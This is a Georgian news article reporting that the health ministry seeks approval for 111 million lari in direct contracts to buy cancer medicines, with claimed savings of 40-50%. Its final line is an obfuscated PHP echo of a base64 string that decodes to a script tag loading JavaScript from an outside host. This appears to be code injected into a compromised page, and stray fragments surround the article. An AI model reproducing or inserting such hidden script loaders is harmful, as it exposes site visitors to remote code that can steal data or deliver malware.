celsiusi
ავერსი შნაიდერი

საქართველოს მთავრობა ონკოლოგიური პაციენტების სამკურნალო მედიკამენტების შემოტანაზე პირდაპირ მოლაპარაკებებს აწარმოებს. ჯანდაცვის სამინისტრო პროგრამის განსახორციელებლად შესყიდვების სააგენტოსგან პირდაპირი კონტრაქტების გაფორმებაზე შესაბამის ნებართვას ითხოვს. განაცხადის მთლიანი ღირებულება 111 მილიონ ლარს შეადგენს. 

როგორც ჯანდაცვის მინისტრმა ზურაბ აზარაშვილმა მაისში განაცხადა, პირდაპირი მოლაპარაკებების შედეგად მთავრობა ძვირად ღირებულ წამლებს საბაზრო ფასზე 40-50%-ით უფრო იაფად შეიძენს. 

ჯანდაცვის სამინისტროს მიერ წარდგენილ განაცხადში არაა მითითებული, თუ რომელი საერთაშორისო კომპანიისგან გეგმავს სახელმწიფო ამ წამლების შეძენას, ასევე არაა წარმოდგენილი იმ ბენეფიციართა რაოდენობაც, რომლისთვისაც ეს შესყიდვა გამოცხადდა. 

“მედიკამენტის რაოდენობის წინასწარ განსაზღვრა შეუძლებელია, ვინაიდან, შესასყიდი მედიკამენტების რაოდენობა დამოკიდებულია პროგრამის მოსარგებლე ბენეფიციარების რაოდენობაზე. 

მიმდინარე ეტაპზე, ღონისძიების წინამოსამზადებელი პერიოდი, რომელიც 2023 წლის გაზაფხულზე დაიწყო თითქმის დასრულებულია, რაც გულისხმობს მოლაპარაკებების წარმოებას მედიკამენტების მწარმოებელ კომპანიებთან სპეციალურ ფასებსა და პირობებზე შესათანხმებლად. აღნიშნულიდან გამომდინარე, მომდევნო ეტაპზე, აუცილებელია წინამდებარე საკითხის დროულად გადაწყვეტა და ღონისძიების დროში შეუფერხებლად ჩატარება,”- ნათქვამია ჯანდაცვის სამინისტროს მიერ წარდგენილ ინფორმაციაში.

635
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");